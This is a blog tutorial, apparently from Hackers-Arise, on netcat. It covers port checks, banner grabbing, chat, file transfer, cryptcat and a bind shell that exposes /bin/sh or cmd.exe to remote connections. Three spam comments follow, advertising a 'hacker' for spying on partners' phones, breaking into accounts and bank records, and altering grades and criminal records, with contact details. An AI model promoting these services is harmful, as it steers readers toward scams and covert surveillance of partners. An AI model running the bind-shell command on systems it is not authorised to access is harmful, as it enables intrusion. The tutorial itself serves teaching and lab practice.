top of page
Search
  • Writer's pictureotw

Netcat, the All- Powerful

Netcat, the All- Powerful

Netcat is one of those few tools--like nmap, Metasploit, Wireshark and few others-- that every hacker should be familiar with. It is simple, elegant and has a multitude of uses.

For instance, netcat can be used to;

  • scan to see if a port is open on a remote system

  • pull the banner from a remote system

  • connect to a network service manually

  • remote administration


This lesson will be dedicated to learning to use netcat and its encrypted cousin, cryptcat. Later in your studies, we will find many uses for this simple tool.


Like so many applications in the Linux world, netcat runs in a client and server mode. This means that we must designate one side the server and one side the client, when using ncat.

I. Netcat Basics

Let's start off by looking at the help screen for netcat. When using netcat, the command is simply "nc". To get the help screen then, type;


kali > nc -h


Note a few key switches;

-e execute

-l listen mode

-n numeric mode (no DNS. Its faster)

-p designates the port

-u UDP mode

-v verbose output


II. Create a Simple TCP Connection


Netcat be used to create simple TCP or UDP connection to system to see whether the port and service available. So, for instance, if I wanted to connect to the SSH on another Kali system, I can type;


kali > nc -vn 192.168.1.103 22


As you can see, netcat was able to connect to OpenSSH on a remote server and the server advertised the service with its banner

(SSH-2.0-OpenSSH_4.7p1 Debian-8Ubuntu1).


III. Banner Grabbing

We can also use netcat to "grab" the banner on web servers by connecting to port 80 and then sending a HTTP / HEAD/1.0 request.


kali > nc -vn 192.168.1.103 80


HEAD / HTTP/1.0


Make certain to hit "Enter" a couple times after typing the HEAD request to pull the banner.


As you can see, we grabbed the banner of Apache 2.2.8 web server running on Ubuntu.


IV. Opening TCP connection between two machines for "chat"

Netcat is capable of creating a simple TCP or UDP connection between two computers and then open a communication channel between them. Let's open a listener on the remote system first.


kali > nc -l -p6996


Then connect to that listener from a remote machine

kali > nc 192.168.1.105 6996


When it connects, I can then begin typing my message, such as "What is the best place to learn hacking?"


That message will then appear on the remote system with the listener. The listener machine can then respond, "Without a doubt, Hackers-Arise!"


...and then the remote machine receives the response!




In this way, we can create a private "chat room" between any two machines!



V. Transferring Files with Netcat


One of the simple wonders of netcat is its ability to transfer files between computers. By creating this simple connection, we can then use that connection to transfer files between two computers. This can be extremely useful as a network administrator and even more useful as a hacker. Netcat can be used to upload and download files from and to the target system.


Let's create a file called "hacker_training".


kali > echo "This is first module in Hacker Fundamentals at Hackers-Arise" > hacker_training


Then, let's view the contents of that file using the Linux command "cat".

kali > cat hacker_training


​Now, let's open a listener on the remote system.


kali > nc -l -p6996


Next, let's send the file to the remote system.


kali > nc 192.168.1.103 6996 <hacker_training


Note, that we use the < to direct the file to netcat.

Finally, go back to our listening system and we should find that the file has been transferred and appears on the screen!



VI. Remote Administration with netcat

Probably the most malicious use of netcat-- and the most effective for the hacker --is the ability to use netcat for remote administration. We can use netcat's ability to execute commands to give the remote connection a shell on the listening system. We can do this in a Linux/Unix machine by making /bin/sh available to the remote connection with the -e (execute), like below. If we were connecting to a Windows machine, we could use cmd.exe (-e cmd.exe) instead of /bin/sh.


kali > nc -l -p6996 -e /bin/sh


Now when I connect to the remote machine, I should be able to get a shell on the remote system. Notice that when I connect to the remote system, I get just a blank line, no command prompt, nothing (if we connect to a Windows system, though, we will get the traditional Windows C: > prompt). This can be confusing to the novice.


If we then type "ls -l" , we get a directory listing from the directory that where we started the netcat listener on the remote system and when we enter "ifconfig", we can see that it returns the IP address of our remote system.




VII. Cryptcat

Cryptcat is netcat's encrypted cousin. This means that we can make a connection to a remote machine where all our traffic is encrypted with some of the strongest encryption algorithms available anywhere, Two-fish (Two-fish encryption is nearly as strong as AES). You can download it at www.cryptcat.sourceforge.net, but if you are using Kali, it is already installed. Although the switches are largely the same as netcat, the command is "cryptcat" rather than "nc".

14,155 views3 comments

3 Comments


Hey everyone , I don’t really know much about this hacking thing but I can direct you to a professional hacking company who helped me to track and hack my boyfriend’s iPhone and his Facebook respectively.. If you need to check on your partner’s sincerity, employee’s honesty, recover your email passwords, Social networks (i.e Facebook, Twitter, IG), change your school grades, clear your criminal records, gain access to bank accounts,spy on your phone. you can just contact them at … Their charges are minimal and negotiable contact them at Henryclarkethicalhacker@gmail,com.. tell him you are from me or text him or whatsapp +12622367526…. You can thank me later.


Like

astriddavina54
astriddavina54
Jan 03, 2023

Contact him for any type of hacking, he is a professional hacker that specializes in exposing cheating spouses, and every other hacking related issues. he is a cyber guru, he helps catch cheating spouses by hacking their communications like call, Facebook, text, emails, Skype, whats-app and many more. I have used this service before and he did a very good job, he gave me every proof I needed to know that my fiancee was cheating. You can contact him on his email to help you catch your cheating spouse, or for any other hacking related problems, like hacking websites, bank statement, grades and many more. he will definitely help you, he has helped a lot of people, contact him on,…


Like

lucyj7537
lucyj7537
Dec 15, 2022

I’m excited to write about Henry Hacker, he is a great and brilliant hacker who penetrated my spouse’s phone without a physical installation app. And I was able to access my spouse’s phone, SMS, Whatsapp, Instagram, Facebook, Wechat, Snapchat, Call Logs, Kik, Twitter and all social media. The most amazing thing there is that he restores all phone deleted text messages. And I also have access to everything including the phone gallery without touching the phone.I can see the whole secret of my spouse. Contact him for any hacking service. He is also a genius in repairing Credit Score, increasing school grade, Clear Criminal Record etc. His service is fast. Contact:, Henryclarkethicalhacker @ gmail .com and you can on whatsapp…

Like
bottom of page